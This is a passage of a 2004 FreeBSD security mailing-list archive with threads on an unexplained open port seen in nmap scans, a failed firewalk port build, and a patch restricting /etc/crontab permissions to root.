From owner-freebsd-security@FreeBSD.ORG Sun Aug 8 05:36:38 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E1D1216A4CE for ; Sun, 8 Aug 2004 05:36:38 +0000 (GMT) Received: from smtp2.eunet.yu (smtp2.eunet.yu [194.247.192.242]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9F19843D39 for ; Sun, 8 Aug 2004 05:36:37 +0000 (GMT) (envelope-from kolicz@eunet.yu) Received: from smtp2.EUnet.yu (root@localhost) by smtp2.eunet.yu (8.12.10/8.12.10) with SMTP id i785aasa021459 for ; Sun, 8 Aug 2004 07:36:36 +0200 Received: from kolic.net (P-2.44.EUnet.yu [213.240.2.44]) by smtp2.eunet.yu (8.12.10/8.12.10) with ESMTP id i785aZls021418 for ; Sun, 8 Aug 2004 07:36:35 +0200 Received: by kolic.net (Postfix, from userid 1001) id A12384107; Sun, 8 Aug 2004 07:35:26 +0200 (CEST) Date: Sun, 8 Aug 2004 07:35:26 +0200 From: Zoran Kolic To: freebsd-security@freebsd.org Message-ID: <20040808053526.GA652@kolic.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Subject: about nmap X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 08 Aug 2004 05:36:39 -0000 Dear all! Last evening I've noticed that my 5.2 box had strange result about nmap search. One port is randomly open when I look from user account. From root everything looks as expected. The comp is most time out of internet. The last thing was adding "expect" package. I am not paniced, could be hiting... Or something in "expect" package... It is random port from 53000 to 57000. Has someone any idea? Best regards. ZK From owner-freebsd-security@FreeBSD.ORG Sun Aug 8 22:49:55 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1159616A4CE for ; Sun, 8 Aug 2004 22:49:55 +0000 (GMT) Received: from mxsf06.cluster1.charter.net (mxsf06.cluster1.charter.net [209.225.28.206]) by mx1.FreeBSD.org (Postfix) with ESMTP id BD33543D45 for ; Sun, 8 Aug 2004 22:49:54 +0000 (GMT) (envelope-from c0ldbyte@myrealbox.com) Received: from mxip04.cluster1.charter.net (mxip04a.cluster1.charter.net [209.225.28.134])i78MnrG7029400 for ; Sun, 8 Aug 2004 18:49:53 -0400 Received: from 24.247.14.41.gha.mi.chartermi.net (HELO eleanor.spectical.net) (24.247.14.41) by mxip04.cluster1.charter.net with ESMTP; 08 Aug 2004 18:49:45 -0400 X-Ironport-AV: i="3.83,112,1089000000"; d="scan'208"; a="184974888:sNHT12311504" Date: Sun, 8 Aug 2004 18:49:31 -0400 (EDT) From: c0ldbyte To: freebsd-security@freebsd.org In-Reply-To: <20040808120101.B771D16A4D0@hub.freebsd.org> Message-ID: References: <20040808120101.B771D16A4D0@hub.freebsd.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Subject: Re: freebsd-security Digest, Vol 71, Issue 2 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 08 Aug 2004 22:49:55 -0000 > From: Zoran Kolic > Subject: about nmap > To: freebsd-security@freebsd.org > Message-ID: <20040808053526.GA652@kolic.net> > Content-Type: text/plain; charset=us-ascii > > Dear all! > Last evening I've noticed that > my 5.2 box had strange result > about nmap search. One port is > randomly open when I look from > user account. From root everything > looks as expected. The comp is > most time out of internet. The > last thing was adding "expect" > package. I am not paniced, could > be hiting... Or something in > "expect" package... It is random > port from 53000 to 57000. > Has someone any idea? > Best regards. > > ZK > Yes this is going to be one of the ports that nmap uses to relay or recieve information back to the client itself. Everything that has anything to do with analyzing the network is going to open a port to recieve back on and most commonly if its because your noticing that port well scanning from a user account its just because of the nmap software picking that port up and not ignoring it like it should be. This e-mail may be privileged and/or confidential, and the sender does not waive any related rights and obligations. Any distribution, use or copying of this e-mail or the information it contains by other than an intended recipient is unauthorized. If you received this e-mail in error, please advise me (by return e-mail or otherwise) immediately. From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 05:59:41 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BE07F16A4CE for ; Mon, 9 Aug 2004 05:59:41 +0000 (GMT) Received: from Neo-Vortex.Ath.Cx (203-217-83-10.dyn.iinet.net.au [203.217.83.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id 63C7F43D53 for ; Mon, 9 Aug 2004 05:59:40 +0000 (GMT) (envelope-from root@Neo-Vortex.Ath.Cx) Received: from localhost.Neo-Vortex.got-root.cc (Neo-Vortex@localhost.Neo-Vortex.got-root.cc [127.0.0.1]) by Neo-Vortex.Ath.Cx (8.12.10/8.12.10) with ESMTP id i795xagC088542; Mon, 9 Aug 2004 15:59:37 +1000 (EST) (envelope-from root@Neo-Vortex.Ath.Cx) Date: Mon, 9 Aug 2004 15:59:36 +1000 (EST) From: Neo-Vortex To: c0ldbyte In-Reply-To: Message-ID: <20040809155909.X88392@Neo-Vortex.Ath.Cx> References: <20040808120101.B771D16A4D0@hub.freebsd.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII cc: freebsd-security@freebsd.org Subject: Re: freebsd-security Digest, Vol 71, Issue 2 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 09 Aug 2004 05:59:41 -0000 it might also be because you cant do a SYN stealth scan as non-root (which is default if you are root) and you have to use the normal TCP Connect method if you arnt root On Sun, 8 Aug 2004, c0ldbyte wrote: > > From: Zoran Kolic > > Subject: about nmap > > To: freebsd-security@freebsd.org > > Message-ID: <20040808053526.GA652@kolic.net> > > Content-Type: text/plain; charset=us-ascii > > > > Dear all! > > Last evening I've noticed that > > my 5.2 box had strange result > > about nmap search. One port is > > randomly open when I look from > > user account. From root everything > > looks as expected. The comp is > > most time out of internet. The > > last thing was adding "expect" > > package. I am not paniced, could > > be hiting... Or something in > > "expect" package... It is random > > port from 53000 to 57000. > > Has someone any idea? > > Best regards. > > > > ZK > > > Yes this is going to be one of the ports that nmap uses to relay or > recieve information back to the client itself. Everything that has > anything to do with analyzing the network is going to open a port > to recieve back on and most commonly if its because your noticing > that port well scanning from a user account its just because of the > nmap software picking that port up and not ignoring it like it should > be. > > This e-mail may be privileged and/or confidential, and the sender > does not waive any related rights and obligations. Any distribution, use > or copying of this e-mail or the information it contains by other than an > intended recipient is unauthorized. If you received this e-mail in error, > please advise me (by return e-mail or otherwise) immediately. > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" > From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 06:21:19 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0683416A4CE for ; Mon, 9 Aug 2004 06:21:19 +0000 (GMT) Received: from smtp2.eunet.yu (smtp2.eunet.yu [194.247.192.242]) by mx1.FreeBSD.org (Postfix) with ESMTP id C558743D45 for ; Mon, 9 Aug 2004 06:21:17 +0000 (GMT) (envelope-from kolicz@eunet.yu) Received: from smtp2.EUnet.yu (root@localhost) by smtp2.eunet.yu (8.12.10/8.12.10) with SMTP id i796LGaD032567 for ; Mon, 9 Aug 2004 08:21:16 +0200 Received: from kolic.net (P-2.102.EUnet.yu [213.240.2.102]) by smtp2.eunet.yu (8.12.10/8.12.10) with ESMTP id i796LEls032262; Mon, 9 Aug 2004 08:21:15 +0200 Received: by kolic.net (Postfix, from userid 1001) id C922B4148; Mon, 9 Aug 2004 08:18:18 +0200 (CEST) Date: Mon, 9 Aug 2004 08:18:18 +0200 From: Zoran Kolic To: larry price Message-ID: <20040809061818.GA634@kolic.net> References: <20040808053526.GA652@kolic.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: cc: freebsd-security@freebsd.org Subject: Re: about nmap X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 09 Aug 2004 06:21:19 -0000 Thanx all for reply. > Got BIND running? BIND usually likes to have a random TCP port bound. Mine > seems to be inclined to hang around in the 3xxx range, though. No, I don't have it. > nmap itself? Why only in userland? X? Could be my old and cheap comp. BTW, 3.48. > what does sockstat -p tell you? port 25 (ipfw2 dynamic rules) port 2628 dictd (server for dictionaries) port 514 syslogd in udp (no rule to access from outside) > Ftp perhaps? No, just a workstation. When I find something open and check it again, it is closed. And... cannot close "syslogd" for report issues. Is it what everyone have open on udp 514? Nothing suspected in conf. Best regards. ZK From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 07:00:34 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 22B9916A4CE for ; Mon, 9 Aug 2004 07:00:34 +0000 (GMT) Received: from ns.pro.sk (proxy.pro.sk [212.55.244.46]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0743343D1F for ; Mon, 9 Aug 2004 07:00:33 +0000 (GMT) (envelope-from prosa@pro.sk) Received: from peter (Peter [192.168.1.53]) by ns.pro.sk (8.12.11/8.12.11) with SMTP id i7970NaL087295; Mon, 9 Aug 2004 09:00:23 +0200 (CEST) (envelope-from prosa@pro.sk) Message-ID: <001e01c47dde$7f562420$3501a8c0@pro.sk> From: "Peter Rosa" To: "FreeBSD Security" References: <20040808053526.GA652@kolic.net> <20040809061818.GA634@kolic.net> Date: Mon, 9 Aug 2004 09:00:04 +0200 X-Priority: 1 X-MSMail-Priority: High X-Mailer: Microsoft Outlook Express 6.00.2800.1437 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1441 X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-1.5.3 (ns.pro.sk [192.168.1.1]); Mon, 09 Aug 2004 09:00:23 +0200 (CEST) X-RAVMilter-Version: 8.4.3(snapshot 20030217) (ns.pro.sk) cc: Zoran Kolic Subject: Re: about nmap X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 09 Aug 2004 07:00:34 -0000 > When I find something open and check > it again, it is closed. And... cannot > close "syslogd" for report issues. At least, can not you run syslogd with syslogd_flags="-ss" in /etc/rc.conf ? It disables listening on 514 at all, but still works locally. Do not use it, if your machine is used as syslogd "file server" for other machines ! And what about some milter ? It could open some local connections on high ports. Do not you have some kind of antispam system on your machine ? Or DansGuardian or something like ? Have you tried to run "sockstat >> /some/file" every minute from cron and try to find which process opens the port ? Peter Rosa From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 19:05:49 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 620B416A4CE for ; Mon, 9 Aug 2004 19:05:49 +0000 (GMT) Received: from hotmail.com (bay10-dav12.bay10.hotmail.com [64.4.37.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 514F443D3F for ; Mon, 9 Aug 2004 19:05:49 +0000 (GMT) (envelope-from kenzo_chin@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 9 Aug 2004 12:05:49 -0700 Received: from 209.187.233.158 by bay10-dav12.bay10.hotmail.com with DAV; Mon, 09 Aug 2004 19:05:48 +0000 X-Originating-IP: [209.187.233.158] X-Originating-Email: [kenzo_chin@hotmail.com] X-Sender: kenzo_chin@hotmail.com From: "Kenzo" To: Date: Mon, 9 Aug 2004 14:04:25 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1437 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441 Message-ID: X-OriginalArrivalTime: 09 Aug 2004 19:05:49.0278 (UTC) FILETIME=[E2000FE0:01C47E43] Subject: firewalk X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 09 Aug 2004 19:05:49 -0000 I was wondering if anyone got firewalk to install? I'm running 4.10 stable and it doesn't seem to want to install. It's looking for libnet 1.1 or higher I believe and the ports only comes with version 1.0. I manually downloaded the latest version and installed it. Still firewalk doesn't know where to look for it. any ideas?? Thanks. From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 19:15:58 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 94F5116A512 for ; Mon, 9 Aug 2004 19:15:58 +0000 (GMT) Received: from ns.isi.ulatina.ac.cr (ns.isi.ulatina.ac.cr [163.178.60.51]) by mx1.FreeBSD.org (Postfix) with ESMTP id 00E7643D55 for ; Mon, 9 Aug 2004 19:15:58 +0000 (GMT) (envelope-from fabmirha@ns.isi.ulatina.ac.cr) Received: by ns.isi.ulatina.ac.cr (Postfix, from userid 5481) id 1E0ED42D2A; Mon, 9 Aug 2004 12:33:38 -0600 (CST) Received: from localhost (localhost [127.0.0.1]) by ns.isi.ulatina.ac.cr (Postfix) with ESMTP id 1B8C82B3CE; Mon, 9 Aug 2004 12:33:38 -0600 (CST) Date: Mon, 9 Aug 2004 12:33:38 -0600 (CST) From: Fabio Miranda Hamburger To: Kenzo In-Reply-To: Message-ID: References: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII cc: freebsd-security@freebsd.org Subject: Re: firewalk X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 09 Aug 2004 19:15:58 -0000 > I was wondering if anyone got firewalk to install? > I'm running 4.10 stable and it doesn't seem to want to install. > It's looking for libnet 1.1 or higher I believe and the ports only comes > with version 1.0. > I manually downloaded the latest version and installed it. Still firewalk > doesn't know where to look for it. #cd /usr/ports/security/firewalk #make install clean works fine. If no, try to cvsup latest -stable port collection. From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 20:28:17 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0787A16A4CE for ; Mon, 9 Aug 2004 20:28:17 +0000 (GMT) Received: from hotmail.com (bay10-dav4.bay10.hotmail.com [64.4.37.178]) by mx1.FreeBSD.org (Postfix) with ESMTP id D8F2543D1D for ; Mon, 9 Aug 2004 20:28:16 +0000 (GMT) (envelope-from kenzo_chin@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 9 Aug 2004 13:28:16 -0700 Received: from 209.187.233.158 by bay10-dav4.bay10.hotmail.com with DAV; Mon, 09 Aug 2004 20:28:16 +0000 X-Originating-IP: [209.187.233.158] X-Originating-Email: [kenzo_chin@hotmail.com] X-Sender: kenzo_chin@hotmail.com From: "Kenzo" Cc: References: Date: Mon, 9 Aug 2004 15:26:52 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1437 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441 Message-ID: X-OriginalArrivalTime: 09 Aug 2004 20:28:16.0806 (UTC) FILETIME=[66F4EC60:01C47E4F] Subject: Re: firewalk X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 09 Aug 2004 20:28:17 -0000 This is what I get. alien# sudo make install clean ===> Building for firewalk-5.0_1 Making all in src cc -DHAVE_CONFIG_H -I. -I. -I../include -I/usr/local/include -O -pipe -ma rch= pentiumpro -Wall -c init.c In file included from /usr/local/include/libnet.h:62, from ../include/firewalk.h:42, from init.c:38: /usr/include/netinet/ip_icmp.h:81: warning: `icmp_pptr' redefined /usr/local/include/dnet/icmp.h:131: warning: this is the location of the previou s definition /usr/include/netinet/ip_icmp.h:82: warning: `icmp_gwaddr' redefined /usr/local/include/dnet/icmp.h:144: warning: this is the location of the previou s definition /usr/include/netinet/ip_icmp.h:185: warning: `ICMP_INFOTYPE' redefined /usr/local/include/dnet/icmp.h:104: warning: this is the location of the previou s definition In file included from ../include/firewalk.h:42, from init.c:38: /usr/local/include/libnet.h:87: #error "byte order has not been specified, you'l l" In file included from ../include/firewalk.h:42, from init.c:38: /usr/local/include/libnet.h:88: syntax error before string constant *** Error code 1 Stop in /usr/ports/security/firewalk/work/Firewalk/src. *** Error code 1 Stop in /usr/ports/security/firewalk/work/Firewalk. *** Error code 1 Stop in /usr/ports/security/firewalk. I have no idea what this is. ----- Original Message ----- From: "Fabio Miranda Hamburger" To: "Kenzo" Cc: Sent: Monday, August 09, 2004 1:33 PM Subject: Re: firewalk > > I was wondering if anyone got firewalk to install? > > I'm running 4.10 stable and it doesn't seem to want to install. > > It's looking for libnet 1.1 or higher I believe and the ports only comes > > with version 1.0. > > I manually downloaded the latest version and installed it. Still firewalk > > doesn't know where to look for it. > > > #cd /usr/ports/security/firewalk > #make install clean > > works fine. > > If no, try to cvsup latest -stable port collection. > > From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 20:53:38 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6776F16A4CE for ; Mon, 9 Aug 2004 20:53:38 +0000 (GMT) Received: from ns1.tiadon.com (SMTP.tiadon.com [69.27.132.161]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2CD7343D4C for ; Mon, 9 Aug 2004 20:53:38 +0000 (GMT) (envelope-from kdk@daleco.biz) Received: from [69.27.131.0] ([69.27.131.0]) by ns1.tiadon.com with Microsoft SMTPSVC(6.0.3790.0); Mon, 9 Aug 2004 15:50:03 -0500 Message-ID: <4117E44E.1010605@daleco.biz> Date: Mon, 09 Aug 2004 15:53:34 -0500 From: "Kevin D. Kinsey, DaleCo, S.P." User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7) Gecko/20040712 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Kenzo References: In-Reply-To: Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 09 Aug 2004 20:50:03.0896 (UTC) FILETIME=[720B0780:01C47E52] cc: freebsd-security@freebsd.org Subject: Re: firewalk X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 09 Aug 2004 20:53:38 -0000 Kenzo wrote: >This is what I get. > >alien# sudo make install clean >===> Building for firewalk-5.0_1 >Making all in src >cc -DHAVE_CONFIG_H -I. -I. -I../include -I/usr/local/include -O -pipe -ma >rch= >pentiumpro -Wall -c init.c >In file included from /usr/local/include/libnet.h:62, > from ../include/firewalk.h:42, > from init.c:38: >/usr/include/netinet/ip_icmp.h:81: warning: `icmp_pptr' redefined >/usr/local/include/dnet/icmp.h:131: warning: this is the location of the >previou >s definition >/usr/include/netinet/ip_icmp.h:82: warning: `icmp_gwaddr' redefined >/usr/local/include/dnet/icmp.h:144: warning: this is the location of the >previou >s definition >/usr/include/netinet/ip_icmp.h:185: warning: `ICMP_INFOTYPE' redefined >/usr/local/include/dnet/icmp.h:104: warning: this is the location of the >previou >s definition >In file included from ../include/firewalk.h:42, > from init.c:38: >/usr/local/include/libnet.h:87: #error "byte order has not been specified, >you'l >l" >In file included from ../include/firewalk.h:42, > from init.c:38: >/usr/local/include/libnet.h:88: syntax error before string constant >*** Error code 1 > >Stop in /usr/ports/security/firewalk/work/Firewalk/src. >*** Error code 1 > >Stop in /usr/ports/security/firewalk/work/Firewalk. >*** Error code 1 > >Stop in /usr/ports/security/firewalk. > >I have no idea what this is. > > Looks like someone made a mistake in the libnet port. You can check and see if they've fixed at either via their website or by checking if a newer version with a different checksum exists at the ftp site. If your ports tree is out of date, it would probably be best to cvsup it anyway... You might also be able to fix the error yourself --- check line 87 - 88 of /usr/local/include/libnet.h. Quite possibly a commented line wrapped wrongly in this case. HTH, Kevin Kinsey From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 16:43:27 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 921DD16A4CE for ; Tue, 10 Aug 2004 16:43:27 +0000 (GMT) Received: from mail.freebsd.org.cn (dns3.freebsd.org.cn [61.129.66.75]) by mx1.FreeBSD.org (Postfix) with SMTP id 1D57543D2F for ; Tue, 10 Aug 2004 16:43:26 +0000 (GMT) (envelope-from delphij@frontfree.net) Received: (qmail 91057 invoked by uid 0); 10 Aug 2004 16:40:53 -0000 Received: from unknown (HELO beastie.frontfree.net) (219.239.98.7) by mail.freebsd.org.cn with SMTP; 10 Aug 2004 16:40:53 -0000 Received: from localhost (localhost.frontfree.net [127.0.0.1]) by beastie.frontfree.net (Postfix) with ESMTP id 07C8A11513 for ; Wed, 11 Aug 2004 00:13:10 +0800 (CST) Received: from beastie.frontfree.net ([127.0.0.1]) by localhost (beastie.frontfree.net [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 03861-03 for ; Wed, 11 Aug 2004 00:13:06 +0800 (CST) Received: by beastie.frontfree.net (Postfix, from userid 1001) id 9408911462; Wed, 11 Aug 2004 00:13:05 +0800 (CST) Date: Wed, 11 Aug 2004 00:13:05 +0800 From: Xin LI To: freebsd-security@FreeBSD.org Message-ID: <20040810161305.GA161@frontfree.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="XF85m9dhOBO43t/C" Content-Disposition: inline User-Agent: Mutt/1.4.2.1i X-GPG-key-ID/Fingerprint: 0xCAEEB8C0 / 43B8 B703 B8DD 0231 B333 DC28 39FB 93A0 CAEE B8C0 X-GPG-Public-Key: http://www.delphij.net/delphij.asc X-Operating-System: FreeBSD beastie.frontfree.net 5.2-delphij FreeBSD 5.2-delphij #3: Fri Jul 30 20:01:43 CST 2004 delphij@beastie.frontfree.net:/usr/obj/usr/src/sys/BEASTIE i386 X-URL: http://www.delphij.net X-By: delphij@beastie.frontfree.net X-Location: Beijing, China X-Virus-Scanned: by amavisd-new at frontfree.net Subject: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 16:43:27 -0000 --XF85m9dhOBO43t/C Content-Type: multipart/mixed; boundary="CE+1k2dSO48ffgeK" Content-Disposition: inline --CE+1k2dSO48ffgeK Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi folks, While investigating OpenBSD's cron implementation, I found that they set the systemwide crontab (a.k.a. /etc/crontab) to be readable by the superuser only. The attached patch will bring this to FreeBSD by moving crontab out from BIN1 group and install it along with master.passwd. This change should not affect the current cron(1) behavior. Cheers, --=20 Xin LI http://www.delphij.net/ See complete headers for GPG key and other information. --CE+1k2dSO48ffgeK Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=patch-etc-Makefile Content-Transfer-Encoding: quoted-printable Index: Makefile =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D RCS file: /home/fcvs/src/etc/Makefile,v retrieving revision 1.327 diff -u -r1.327 Makefile --- Makefile 23 Mar 2004 22:17:34 -0000 1.327 +++ Makefile 10 Aug 2004 06:03:59 -0000 @@ -6,7 +6,7 @@ .endif =20 BIN1=3D amd.map apmd.conf auth.conf \ - crontab csh.cshrc csh.login csh.logout devd.conf devfs.conf \ + csh.cshrc csh.login csh.logout devd.conf devfs.conf \ dhclient.conf disktab fbtab ftpusers gettytab group \ hosts hosts.allow hosts.equiv hosts.lpd \ inetd.conf login.access login.conf \ @@ -73,7 +73,7 @@ ${INSTALL} -o ${BINOWN} -g ${BINGRP} -m 755 \ ${BIN2} ${DESTDIR}/etc; \ ${INSTALL} -o ${BINOWN} -g ${BINGRP} -m 600 \ - master.passwd nsmb.conf opieaccess ${DESTDIR}/etc; \ + crontab master.passwd nsmb.conf opieaccess ${DESTDIR}/etc; \ pwd_mkdb -p -d ${DESTDIR}/etc ${DESTDIR}/etc/master.passwd cd ${.CURDIR}/bluetooth; ${MAKE} install cd ${.CURDIR}/defaults; ${MAKE} install --CE+1k2dSO48ffgeK-- --XF85m9dhOBO43t/C Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (FreeBSD) iD8DBQFBGPQROfuToMruuMARAoTqAJkBHDBzhA/syFnozOSSVguF6rDAEACffdM1 dKvIfI0ua19FCrBFg41KksM= =uVB3 -----END PGP SIGNATURE----- --XF85m9dhOBO43t/C-- From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 17:02:11 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 93D3D16A4CE for ; Tue, 10 Aug 2004 17:02:11 +0000 (GMT) Received: from sccrmhc13.comcast.net (sccrmhc13.comcast.net [204.127.202.64]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3E9AE43D2D for ; Tue, 10 Aug 2004 17:02:11 +0000 (GMT) (envelope-from DougB@freebsd.org) Received: from dougb.net ([24.130.110.32]) by comcast.net (sccrmhc13) with SMTP id <2004081017021001600qu9sre>; Tue, 10 Aug 2004 17:02:10 +0000 Date: Tue, 10 Aug 2004 10:02:09 -0700 (PDT) From: Doug Barton To: Xin LI In-Reply-To: <20040810161305.GA161@frontfree.net> Message-ID: <20040810095953.H1984@qbhto.arg> References: <20040810161305.GA161@frontfree.net> Organization: http://www.FreeBSD.org/ X-message-flag: Outlook -- Not just for spreading viruses anymore! MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed cc: "freebsd-security@FreeBSD.org" Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 17:02:11 -0000 On Wed, 11 Aug 2004, Xin LI wrote: > Hi folks, > > While investigating OpenBSD's cron implementation, I found that they set > the systemwide crontab (a.k.a. /etc/crontab) to be readable by the > superuser only. The attached patch will bring this to FreeBSD by moving > crontab out from BIN1 group and install it along with master.passwd. Do you have a reason for wanting to do this other than, "OpenBSD does it this way?" I personally see no problems, and some benefit for users being able to see the system crontab. If the superuser needs to run "secret" cron jobs, then there is root's crontab that can be used for this purpose. Can you elaborate on your thinking? Doug -- This .signature sanitized for your protection From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 18:10:49 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 155C816A4CE for ; Tue, 10 Aug 2004 18:10:49 +0000 (GMT) Received: from mail.freebsd.org.cn (dns3.freebsd.org.cn [61.129.66.75]) by mx1.FreeBSD.org (Postfix) with SMTP id 9E11743D1D for ; Tue, 10 Aug 2004 18:10:47 +0000 (GMT) (envelope-from delphij@frontfree.net) Received: (qmail 91509 invoked by uid 0); 10 Aug 2004 18:08:14 -0000 Received: from unknown (HELO beastie.frontfree.net) (219.239.98.7) by mail.freebsd.org.cn with SMTP; 10 Aug 2004 18:08:14 -0000 Received: from localhost (localhost.frontfree.net [127.0.0.1]) by beastie.frontfree.net (Postfix) with ESMTP id AE698119DE; Wed, 11 Aug 2004 02:10:44 +0800 (CST) Received: 